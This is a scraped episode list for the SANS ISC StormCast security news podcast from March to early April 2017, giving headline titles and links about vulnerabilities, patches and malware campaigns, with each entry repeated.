ISC StormCast for Thursday, April 6th 2017

Whitelists: The Holy Grail of Attackers https://isc.sans.edu/forums/diary/Whitelists+The+Holy+Grail+of+Attackers/22262/ Java Struts2 Vulnerability Used To Install Ransomware https://isc.sans.edu/forums/diary/Java+Struts2+Vulnerability+Used+To+Install+Cerber+Crypto+Ransomware/22264/ Brazilian Bank Looses Control Over Domains https://threatpost.com/lessons-from-top-to-bottom-compromise-of-brazilian-bank/124770/ Google Android April Patch Day https://source.android.com/security/bulletin/2017-04-01#security-vulnerability-summary Radware Observes "BrickerBot" Destroying Devices https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/ Struts2 Vulnerability Webcast https://www.sans.org/webcasts/struts-shock-current-attacks-struts2-defend-104787
4/6/20176 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, April 6th 2017

Whitelists: The Holy Grail of Attackers https://isc.sans.edu/forums/diary/Whitelists+The+Holy+Grail+of+Attackers/22262/ Java Struts2 Vulnerability Used To Install Ransomware https://isc.sans.edu/forums/diary/Java+Struts2+Vulnerability+Used+To+Install+Cerber+Crypto+Ransomware/22264/ Brazilian Bank Looses Control Over Domains https://threatpost.com/lessons-from-top-to-bottom-compromise-of-brazilian-bank/124770/ Google Android April Patch Day https://source.android.com/security/bulletin/2017-04-01#security-vulnerability-summary Radware Observes "BrickerBot" Destroying Devices https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/ Struts2 Vulnerability Webcast https://www.sans.org/webcasts/struts-shock-current-attacks-struts2-defend-104787
4/6/20176 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, April 5th 2017

Exploiting Broadcom's Wi-Fi Stack https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html Covert Channel Between Virtual Machines Via CPU Cache https://cmaurice.fr/pdf/ndss17_maurice.pdf 40 Vulnerabilities in Samsung Tizen https://motherboard.vice.com/en_us/article/samsung-tizen-operating-system-bugs-vulnerabilities
4/5/20175 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, April 5th 2017

Exploiting Broadcom's Wi-Fi Stack https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html Covert Channel Between Virtual Machines Via CPU Cache https://cmaurice.fr/pdf/ndss17_maurice.pdf 40 Vulnerabilities in Samsung Tizen https://motherboard.vice.com/en_us/article/samsung-tizen-operating-system-bugs-vulnerabilities
4/5/20175 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, April 4th 2017

Apple Releases iOS 10.3.1 to Remedy Wifi Remote Code Execution https://support.apple.com/en-us/HT207688 Practical Use of SHA1 Collisions: ISO Images https://isc.sans.edu/forums/diary/A+Practical+Use+for+a+SHA1+Collision/22257/ Microsoft Defender False Positive https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm%3AWin32%2FBluber.A Cracking Weak Session Secrets https://martinfowler.com/articles/session-secret.html Skype Malvertising Advertises Fake Flash Players https://www.bleepingcomputer.com/news/security/skype-malvertising-campaign-pushes-fake-flash-player/
4/4/20175 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, April 4th 2017

Apple Releases iOS 10.3.1 to Remedy Wifi Remote Code Execution https://support.apple.com/en-us/HT207688 Practical Use of SHA1 Collisions: ISO Images https://isc.sans.edu/forums/diary/A+Practical+Use+for+a+SHA1+Collision/22257/ Microsoft Defender False Positive https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm%3AWin32%2FBluber.A Cracking Weak Session Secrets https://martinfowler.com/articles/session-secret.html Skype Malvertising Advertises Fake Flash Players https://www.bleepingcomputer.com/news/security/skype-malvertising-campaign-pushes-fake-flash-player/
4/4/20175 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, April 3rd 2017

Google Discovers More LastPass Vulnerabilities; https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6 Attacking KeePass https://www.slideshare.net/harmj0y/a-case-study-in-attacking-keepass https://github.com/HarmJ0y/KeeThief Bypassing Cylance http://www.blackhillsinfosec.com/?p=5792 Mimi Penguin: Extracting Credentials From Memory on Linux Tools https://github.com/huntergregal/mimipenguin Windows 2003 / IIS 6 Exploit https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html https://github.com/rapid7/metasploit-framework/pull/8162
4/3/20175 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, April 3rd 2017

Google Discovers More LastPass Vulnerabilities; https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6 Attacking KeePass https://www.slideshare.net/harmj0y/a-case-study-in-attacking-keepass https://github.com/HarmJ0y/KeeThief Bypassing Cylance http://www.blackhillsinfosec.com/?p=5792 Mimi Penguin: Extracting Credentials From Memory on Linux Tools https://github.com/huntergregal/mimipenguin Windows 2003 / IIS 6 Exploit https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html https://github.com/rapid7/metasploit-framework/pull/8162
4/3/20175 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, March 31st 2017

Diverting built-in features for the bad https://isc.sans.edu/forums/diary/Diverting+builtin+features+for+the+bad/22250/ Fake Job Offers to GitHub Developers Include Malware http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/ Drones With Lasers! https://arxiv.org/pdf/1703.07751.pdf
3/31/20175 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, March 31st 2017

Diverting built-in features for the bad https://isc.sans.edu/forums/diary/Diverting+builtin+features+for+the+bad/22250/ Fake Job Offers to GitHub Developers Include Malware http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/ Drones With Lasers! https://arxiv.org/pdf/1703.07751.pdf
3/31/20175 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, March 30th 2017

Logical and Physical Security Correlation https://isc.sans.edu/forums/diary/Logical+Physical+Security+Correlation/22243/ Recent Mirai DDoS Attacks https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html Crusader Injects Fake Support Phone Numbers into Websites https://www.bleepingcomputer.com/news/security/adware-replaces-phone-numbers-for-security-firms-returned-in-search-results/ VMWare Closes Pwn2Own Guest Escape Vulnerabilities http://www.vmware.com/security/advisories/VMSA-2017-0006.html Apple iCloud for Windows Update https://support.apple.com/de-de/HT207607
3/30/20175 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, March 30th 2017

Logical and Physical Security Correlation https://isc.sans.edu/forums/diary/Logical+Physical+Security+Correlation/22243/ Recent Mirai DDoS Attacks https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html Crusader Injects Fake Support Phone Numbers into Websites https://www.bleepingcomputer.com/news/security/adware-replaces-phone-numbers-for-security-firms-returned-in-search-results/ VMWare Closes Pwn2Own Guest Escape Vulnerabilities http://www.vmware.com/security/advisories/VMSA-2017-0006.html Apple iCloud for Windows Update https://support.apple.com/de-de/HT207607
3/30/20175 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, March 29th 2017

New Exploit Variant for Recent Struts2 Vulnerability https://blog.gdssecurity.com/labs/2017/3/27/an-analysis-of-cve-2017-5638.html PoC Exploit for iBook ePub Javascript Vulnerability https://s1gnalcha0s.github.io/ibooks/epub/2017/03/27/This-book-reads-you-using-JavaScript.html Microsoft Docs.com Leak https://twitter.com/gossithedog/status/845446263244050434 Symantec SSL CA tool https://www.renditioninfosec.com/socapps/sslcheck/index.php
3/29/20175 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, March 29th 2017

New Exploit Variant for Recent Struts2 Vulnerability https://blog.gdssecurity.com/labs/2017/3/27/an-analysis-of-cve-2017-5638.html PoC Exploit for iBook ePub Javascript Vulnerability https://s1gnalcha0s.github.io/ibooks/epub/2017/03/27/This-book-reads-you-using-JavaScript.html Microsoft Docs.com Leak https://twitter.com/gossithedog/status/845446263244050434 Symantec SSL CA tool https://www.renditioninfosec.com/socapps/sslcheck/index.php
3/29/20175 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, March 28th 2017

Apple Updates https://support.apple.com/en-us/HT201222 IIS 6 / Windows Server 2003 Exploit https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py Symantec SSL Update https://www.symantec.com/connect/blogs/message-our-ca-customers
3/28/20176 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, March 28th 2017

Apple Updates https://support.apple.com/en-us/HT201222 IIS 6 / Windows Server 2003 Exploit https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py Symantec SSL Update https://www.symantec.com/connect/blogs/message-our-ca-customers
3/28/20176 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, March 27th 2017

Google Announces Removal of Symantec CAs for Extended Validation https://www.symantec.com/connect/blogs/symantec-backs-its-ca https://groups.google.com/a/chromium.org/forum/#!topic/blink-dev/eUAKwjihhBs https://chromium.googlesource.com/chromium/src/+/master/net/data/ssl/symantec/README.md Spoofing Referrer in Microsoft Edge https://www.brokenbrowser.com/referer-spoofing-patch-bypass/ Smart TV Compromise Via Broadcast Signals https://www.youtube.com/watch?v=bOJ_8QHX6OA Defending Web Applications Class https://www.sans.org/event/sans-security-west-2017/course/defending-web-applications-security-essentials
3/27/20176 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, March 27th 2017

Google Announces Removal of Symantec CAs for Extended Validation https://www.symantec.com/connect/blogs/symantec-backs-its-ca https://groups.google.com/a/chromium.org/forum/#!topic/blink-dev/eUAKwjihhBs https://chromium.googlesource.com/chromium/src/+/master/net/data/ssl/symantec/README.md Spoofing Referrer in Microsoft Edge https://www.brokenbrowser.com/referer-spoofing-patch-bypass/ Smart TV Compromise Via Broadcast Signals https://www.youtube.com/watch?v=bOJ_8QHX6OA Defending Web Applications Class https://www.sans.org/event/sans-security-west-2017/course/defending-web-applications-security-essentials
3/27/20176 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, March 24th 2017

"Swearing Trojan" Uses Fake BTSs To Spread Malware http://blog.checkpoint.com/2017/03/21/swearing-trojan-continues-rage-even-authors-arrest/ Lastpass Updates ClickJacking Exploit (Again) https://bugs.chromium.org/p/project-zero/issues/detail?id=1188&desc=2 Application Verifier "Bug" https://github.com/ionescu007/HookingNirvana/blob/master/Esoteric%20Hooks.pdf
3/24/20176 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, March 24th 2017

"Swearing Trojan" Uses Fake BTSs To Spread Malware http://blog.checkpoint.com/2017/03/21/swearing-trojan-continues-rage-even-authors-arrest/ Lastpass Updates ClickJacking Exploit (Again) https://bugs.chromium.org/p/project-zero/issues/detail?id=1188&desc=2 Application Verifier "Bug" https://github.com/ionescu007/HookingNirvana/blob/master/Esoteric%20Hooks.pdf
3/24/20176 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, March 23rd 2017

Criminals Threaten to Erase Millions of iCloud Conntected Apple devices https://motherboard.vice.com/en_us/article/hackers-we-will-remotely-wipe-iphones-unless-apple-pays-ransom?utm_source=vicefbus Siemens Control Systems Affected by Fake Firmware https://dragos.com/blog/mimics/ GitHub Used for C&C http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/ Adium IM Vulnerable to Older libpurple Issue http://seclists.org/fulldisclosure/2017/Mar/57
3/23/20175 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, March 23rd 2017

Criminals Threaten to Erase Millions of iCloud Conntected Apple devices https://motherboard.vice.com/en_us/article/hackers-we-will-remotely-wipe-iphones-unless-apple-pays-ransom?utm_source=vicefbus Siemens Control Systems Affected by Fake Firmware https://dragos.com/blog/mimics/ GitHub Used for C&C http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/ Adium IM Vulnerable to Older libpurple Issue http://seclists.org/fulldisclosure/2017/Mar/57
3/23/20175 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, March 22nd 2017

Password Encrypted Word File Delivers Malware https://isc.sans.edu/forums/diary/Malspam+with+passwordprotected+Word+documents/22203/ Critical LastPass Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1209 Nest Camera Bluetooth Vulnerability https://github.com/jasondoyle/Google-Nest-Cam-Bug-Disclosures/blob/master/README.md
3/22/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, March 22nd 2017

Password Encrypted Word File Delivers Malware https://isc.sans.edu/forums/diary/Malspam+with+passwordprotected+Word+documents/22203/ Critical LastPass Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1209 Nest Camera Bluetooth Vulnerability https://github.com/jasondoyle/Google-Nest-Cam-Bug-Disclosures/blob/master/README.md
3/22/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, March 21st 2017

CISCO Releases Advisory With Details Regarding CMP Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp Pwn2Own Contest Leads to Exploits Against All Browsers (and VM!) https://www.zerodayinitiative.com/blog/2017/3/17/the-results-pwn2own-2017-day-three Git Moving Away From SHA1 (likely to SHA3) https://news.ycombinator.com/item?id=13906804 Proxy Security https://isc.sans.edu/forums/diary/What+is+really+being+proxied/22165/ https://www.us-cert.gov/ncas/alerts/TA17-075A
3/21/20176 minutes
Episode Artwork

ISC StormCast for Tuesday, March 21st 2017

CISCO Releases Advisory With Details Regarding CMP Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp Pwn2Own Contest Leads to Exploits Against All Browsers (and VM!) https://www.zerodayinitiative.com/blog/2017/3/17/the-results-pwn2own-2017-day-three Git Moving Away From SHA1 (likely to SHA3) https://news.ycombinator.com/item?id=13906804 Proxy Security https://isc.sans.edu/forums/diary/What+is+really+being+proxied/22165/ https://www.us-cert.gov/ncas/alerts/TA17-075A
3/21/20176 minutes
Episode Artwork

ISC StormCast for Monday, March 20th 2017

An Example of a Multiple States Dropper https://isc.sans.edu/forums/diary/Example+of+Multiple+Stages+Dropper/22197/ Real-World Wiretaping Attacks Against ZRTP https://www.ibr.cs.tu-bs.de/papers/schuermann-popets2017.pdf Authenticating Against MySQL Server Using a Hashed Password https://github.com/cyrus-and/mysql-unsha1
3/20/20175 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, March 20th 2017

An Example of a Multiple States Dropper https://isc.sans.edu/forums/diary/Example+of+Multiple+Stages+Dropper/22197/ Real-World Wiretaping Attacks Against ZRTP https://www.ibr.cs.tu-bs.de/papers/schuermann-popets2017.pdf Authenticating Against MySQL Server Using a Hashed Password https://github.com/cyrus-and/mysql-unsha1
3/20/20175 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, March 17th 2017

Certain Ubiquity Equipment Vulnerable to CSRF/Code Execution https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170316-0_Ubiquiti_Networks_authenticated_command_injection_v10.txt Proton Mac OS RAT https://www.cybersixgill.com/proton-a-new-mac-os-rat/ Linux Kernel n_hdlc Privilege Escalation http://seclists.org/oss-sec/2017/q1/569 VMWare Copy/Paste Exploit Fixed https://www.vmware.com/security/advisories/VMSA-2017-0005.html
3/17/20176 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, March 17th 2017

Certain Ubiquity Equipment Vulnerable to CSRF/Code Execution https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170316-0_Ubiquiti_Networks_authenticated_command_injection_v10.txt Proton Mac OS RAT https://www.cybersixgill.com/proton-a-new-mac-os-rat/ Linux Kernel n_hdlc Privilege Escalation http://seclists.org/oss-sec/2017/q1/569 VMWare Copy/Paste Exploit Fixed https://www.vmware.com/security/advisories/VMSA-2017-0005.html
3/17/20176 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, March 16th 2017

Twitter App "Twitter Counter" Compromise Leads to Unauthorized Tweets From a Large Number of Accounts https://twitter.com/thecounter Telegram and WhatsApp Image Vulnerability http://blog.checkpoint.com/2017/03/15/check-point-discloses-vulnerability-whatsapp-telegram/ RSA Panel Webcast https://cc.readytalk.com/registration/#/?meeting=6oowksc223hm&campaign=ijmt1z8qsc1q
3/16/20176 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, March 16th 2017

Twitter App "Twitter Counter" Compromise Leads to Unauthorized Tweets From a Large Number of Accounts https://twitter.com/thecounter Telegram and WhatsApp Image Vulnerability http://blog.checkpoint.com/2017/03/15/check-point-discloses-vulnerability-whatsapp-telegram/ RSA Panel Webcast https://cc.readytalk.com/registration/#/?meeting=6oowksc223hm&campaign=ijmt1z8qsc1q
3/16/20176 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, March 15th 2017

Microsoft's Double Patch Tuesday https://isc.sans.edu/forums/diary/February+and+March+Microsoft+Patch+Tuesday/22185/
3/15/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, March 15th 2017

Microsoft's Double Patch Tuesday https://isc.sans.edu/forums/diary/February+and+March+Microsoft+Patch+Tuesday/22185/
3/15/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, March 14th 2017

Creating SHA3 Hashes with sigs.py https://isc.sans.edu/forums/diary/New+tool+sigspy/22181/ Canada Revenue Agency Website Attacked / Down over Struts2 http://www.cbc.ca/news/politics/cra-internet-vulnerability-government-1.4022591 Webkit Exploit Adobted to Nintendo Switch https://www.youtube.com/watch?v=xkdPjbaLngE Analysis of Outdated Javascript Libraries on the Web http://www.ccs.neu.edu/home/arshad/publications/ndss2017jslibs.pdf Github Enterprise SAML Authentication Bypass http://www.economyofmechanism.com/github-saml
3/14/20175 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, March 14th 2017

Creating SHA3 Hashes with sigs.py https://isc.sans.edu/forums/diary/New+tool+sigspy/22181/ Canada Revenue Agency Website Attacked / Down over Struts2 http://www.cbc.ca/news/politics/cra-internet-vulnerability-government-1.4022591 Webkit Exploit Adobted to Nintendo Switch https://www.youtube.com/watch?v=xkdPjbaLngE Analysis of Outdated Javascript Libraries on the Web http://www.ccs.neu.edu/home/arshad/publications/ndss2017jslibs.pdf Github Enterprise SAML Authentication Bypass http://www.economyofmechanism.com/github-saml
3/14/20175 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, March 13th 2017

Issues With Out Of Date Geo Location Databases https://isc.sans.edu/forums/diary/The+Side+Effect+of+GeoIP+Filters/22173/ Recovering Mobile Device PINs via Thermal Images http://www.mkhamis.com/data/papers/abdelrahman2017chi.pdf Unmasking Randomized MAC Addresses https://arxiv.org/abs/1703.02874v1 Mobile Phone Supply Chain Attacks http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/
3/13/20176 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, March 13th 2017

Issues With Out Of Date Geo Location Databases https://isc.sans.edu/forums/diary/The+Side+Effect+of+GeoIP+Filters/22173/ Recovering Mobile Device PINs via Thermal Images http://www.mkhamis.com/data/papers/abdelrahman2017chi.pdf Unmasking Randomized MAC Addresses https://arxiv.org/abs/1703.02874v1 Mobile Phone Supply Chain Attacks http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/
3/13/20176 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, March 10th 2017

Struts 2 Update https://isc.sans.edu/forums/diary/Critical+Apache+Struts+2+Vulnerability+Patch+Now/22169/ Exploits Against Haraka Mail Server https://github.com/outflanknl/Exploits/blob/master/harakiri-CVE-2016-1000282.py Android Password Stealing Apps http://www.welivesecurity.com/2017/03/09/new-instagram-credentials-stealers-discovered-google-play/ Drupal Services Module Vulnerability and Exploit https://www.ambionics.io/blog/drupal-services-module-rce https://www.drupal.org/node/2858847
3/10/20175 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, March 10th 2017

Struts 2 Update https://isc.sans.edu/forums/diary/Critical+Apache+Struts+2+Vulnerability+Patch+Now/22169/ Exploits Against Haraka Mail Server https://github.com/outflanknl/Exploits/blob/master/harakiri-CVE-2016-1000282.py Android Password Stealing Apps http://www.welivesecurity.com/2017/03/09/new-instagram-credentials-stealers-discovered-google-play/ Drupal Services Module Vulnerability and Exploit https://www.ambionics.io/blog/drupal-services-module-rce https://www.drupal.org/node/2858847
3/10/20175 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, March 9th 2017

Security Researches Target Nintendo Switch https://twitter.com/qlutoo https://www.youtube.com/watch?v=CwdDN1kA93Q&feature=youtu.be Dockerscan https://github.com/cr0hn/dockerscan 1 in 5 Websites still rely on SHA-1 Based Certificates http://www.theregister.co.uk/2017/03/08/sha1_certificate_survey/ Not All Malware Samples Are Complex https://isc.sans.edu/forums/diary/Not+All+Malware+Samples+Are+Complex/22163/ Struts Vulnerability Included in Metasploit https://github.com/rapid7/metasploit-framework/issues/8064 https://cwiki.apache.org/confluence/display/WW/S2-045?from=groupmessage
3/9/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, March 9th 2017

Security Researches Target Nintendo Switch https://twitter.com/qlutoo https://www.youtube.com/watch?v=CwdDN1kA93Q&feature=youtu.be Dockerscan https://github.com/cr0hn/dockerscan 1 in 5 Websites still rely on SHA-1 Based Certificates http://www.theregister.co.uk/2017/03/08/sha1_certificate_survey/ Not All Malware Samples Are Complex https://isc.sans.edu/forums/diary/Not+All+Malware+Samples+Are+Complex/22163/ Struts Vulnerability Included in Metasploit https://github.com/rapid7/metasploit-framework/issues/8064 https://cwiki.apache.org/confluence/display/WW/S2-045?from=groupmessage
3/9/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, March 8th 2017

CIA Leak (note that link lead directly to leaked documents) https://wikileaks.com/ciav7p1/ From Shamoon To Stonedrill: Evolution of Wipers Attacking Saudi Organziations https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf WordPress Update https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/ Reading Secret Keys From SGX Enclaves https://arxiv.org/abs/1702.08719
3/8/20176 minutes, 41 seconds
Episode Artwork

ISC StormCast for Wednesday, March 8th 2017

CIA Leak (note that link lead directly to leaked documents) https://wikileaks.com/ciav7p1/ From Shamoon To Stonedrill: Evolution of Wipers Attacking Saudi Organziations https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf WordPress Update https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/ Reading Secret Keys From SGX Enclaves https://arxiv.org/abs/1702.08719
3/8/20176 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, March 7th 2017

Typosquatting Against Santander Bank in Brazil With Phone Call Follow-up https://isc.sans.edu/forums/diary/A+very+convincing+Typosquatting+Social+Engineering+campaign+is+targeting+Santander+corporate+customers+in+Brazil/22157/ Post Mortem on 911 DDoS Attack https://www.wsj.com/articles/how-a-cyberattack-overwhelmed-the-911-system-1488554972 Nextcloud/Owncloud Scanner https://scan.nextcloud.com Western Digital MyCloud Vulnerability https://blog.exploitee.rs/2017/hacking_wd_mycloud/
3/7/20176 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, March 7th 2017

Typosquatting Against Santander Bank in Brazil With Phone Call Follow-up https://isc.sans.edu/forums/diary/A+very+convincing+Typosquatting+Social+Engineering+campaign+is+targeting+Santander+corporate+customers+in+Brazil/22157/ Post Mortem on 911 DDoS Attack https://www.wsj.com/articles/how-a-cyberattack-overwhelmed-the-911-system-1488554972 Nextcloud/Owncloud Scanner https://scan.nextcloud.com Western Digital MyCloud Vulnerability https://blog.exploitee.rs/2017/hacking_wd_mycloud/
3/7/20176 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, March 6th 2017

How Your Pictures Affect Your Website Reputation https://isc.sans.edu/forums/diary/How+your+pictures+may+affect+your+website+reputation/22151/ De-Obuscating Padded Code https://isc.sans.edu/forums/diary/Another+example+of+maldoc+string+obfuscation+with+extra+bonus+UAC+bypass/22153/ FoxIT PDF Reader Vulnerability https://www.foxitsoftware.com/support/security-bulletins.php#content-2017 Applying SHA1 Shatter Attack To Bittorent https://biterrant.io Gargoyle Memory Scanning Evasion https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html Attacking Synergy Clients https://www.n00py.io/2017/03/compromising-synergy-clients-with-a-rogue-synergy-server/
3/6/20176 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, March 6th 2017

How Your Pictures Affect Your Website Reputation https://isc.sans.edu/forums/diary/How+your+pictures+may+affect+your+website+reputation/22151/ De-Obuscating Padded Code https://isc.sans.edu/forums/diary/Another+example+of+maldoc+string+obfuscation+with+extra+bonus+UAC+bypass/22153/ FoxIT PDF Reader Vulnerability https://www.foxitsoftware.com/support/security-bulletins.php#content-2017 Applying SHA1 Shatter Attack To Bittorent https://biterrant.io Gargoyle Memory Scanning Evasion https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html Attacking Synergy Clients https://www.n00py.io/2017/03/compromising-synergy-clients-with-a-rogue-synergy-server/
3/6/20176 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, March 3rd 2017

Business E-Mail Compromise and Sender Policy Framework Typos (SPF) https://isc.sans.edu/forums/diary/Phishing+for+Big+Money+Wire+Transfers+is+Still+Alive+and+Well+or+For+Want+of+Good+Punctuation+all+was+Lost/22141/ Android Developers Infected With Malware Publishing Malicious Apps http://researchcenter.paloaltonetworks.com/2017/03/unit42-google-play-apps-infected-malicious-iframes/ DBLTek GoIP Backdoor https://www.trustwave.com/Resources/SpiderLabs-Blog/Undocumented-Backdoor-Account-in-DBLTek-GoIP/ Decrypting Findzip/Patcher Ransomware https://blog.malwarebytes.com/cybercrime/2017/02/decrypting-after-a-findzip-ransomware-infection/
3/3/20175 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, March 3rd 2017

Business E-Mail Compromise and Sender Policy Framework Typos (SPF) https://isc.sans.edu/forums/diary/Phishing+for+Big+Money+Wire+Transfers+is+Still+Alive+and+Well+or+For+Want+of+Good+Punctuation+all+was+Lost/22141/ Android Developers Infected With Malware Publishing Malicious Apps http://researchcenter.paloaltonetworks.com/2017/03/unit42-google-play-apps-infected-malicious-iframes/ DBLTek GoIP Backdoor https://www.trustwave.com/Resources/SpiderLabs-Blog/Undocumented-Backdoor-Account-in-DBLTek-GoIP/ Decrypting Findzip/Patcher Ransomware https://blog.malwarebytes.com/cybercrime/2017/02/decrypting-after-a-findzip-ransomware-infection/
3/3/20175 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, March 2nd 2017

LDAP and STARTTLS https://isc.sans.edu/forums/diary/SSLTLS+on+port+389+Say+what/22135/ Wordpress NextGen Gallery Plugin SQL Injection Vulnerability https://blog.sucuri.net/2017/02/sql-injection-vulnerability-nextgen-gallery-wordpress.html Password Manager Insecurities https://team-sik.org/trent_portfolio/password-manager-apps/ Slack Insecure Cross Window Messaging https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/ Google Voice Recognition Used to Break Google ReCaptcha Audio Challenge https://east-ee.com/2017/02/28/rebreakcaptcha-breaking-googles-recaptcha-v2-using-google/
3/2/20176 minutes
Episode Artwork

ISC StormCast for Thursday, March 2nd 2017

LDAP and STARTTLS https://isc.sans.edu/forums/diary/SSLTLS+on+port+389+Say+what/22135/ Wordpress NextGen Gallery Plugin SQL Injection Vulnerability https://blog.sucuri.net/2017/02/sql-injection-vulnerability-nextgen-gallery-wordpress.html Password Manager Insecurities https://team-sik.org/trent_portfolio/password-manager-apps/ Slack Insecure Cross Window Messaging https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/ Google Voice Recognition Used to Break Google ReCaptcha Audio Challenge https://east-ee.com/2017/02/28/rebreakcaptcha-breaking-googles-recaptcha-v2-using-google/
3/2/20176 minutes
Episode Artwork

ISC StormCast for Wednesday, March 1st 2017

Amazon Cloud IPv4 Reuse Leads to Stray Requests https://isc.sans.edu/forums/diary/My+Catch+Of+4+Months+In+The+Amazon+IP+Address+Space/22129 Amazon S3 Outage https://isc.sans.edu/forums/diary/Amazon+S3+Outage/22131/ CloudPets Leaks Recordings https://www.troyhunt.com/data-from-connected-cloudpets-teddy-bears-leaked-and-ransomed-exposing-kids-voice-messages/ ESET Antivirus Vulnerability Puts Macs at Risk http://seclists.org/fulldisclosure/2017/Feb/68 Analysis of a Simple PHP Backdoor https://isc.sans.edu/forums/diary/Analysis+of+a+Simple+PHP+Backdoor/22127/
3/1/20175 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, March 1st 2017

Amazon Cloud IPv4 Reuse Leads to Stray Requests https://isc.sans.edu/forums/diary/My+Catch+Of+4+Months+In+The+Amazon+IP+Address+Space/22129 Amazon S3 Outage https://isc.sans.edu/forums/diary/Amazon+S3+Outage/22131/ CloudPets Leaks Recordings https://www.troyhunt.com/data-from-connected-cloudpets-teddy-bears-leaked-and-ransomed-exposing-kids-voice-messages/ ESET Antivirus Vulnerability Puts Macs at Risk http://seclists.org/fulldisclosure/2017/Feb/68 Analysis of a Simple PHP Backdoor https://isc.sans.edu/forums/diary/Analysis+of+a+Simple+PHP+Backdoor/22127/
3/1/20175 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, February 28th 2017

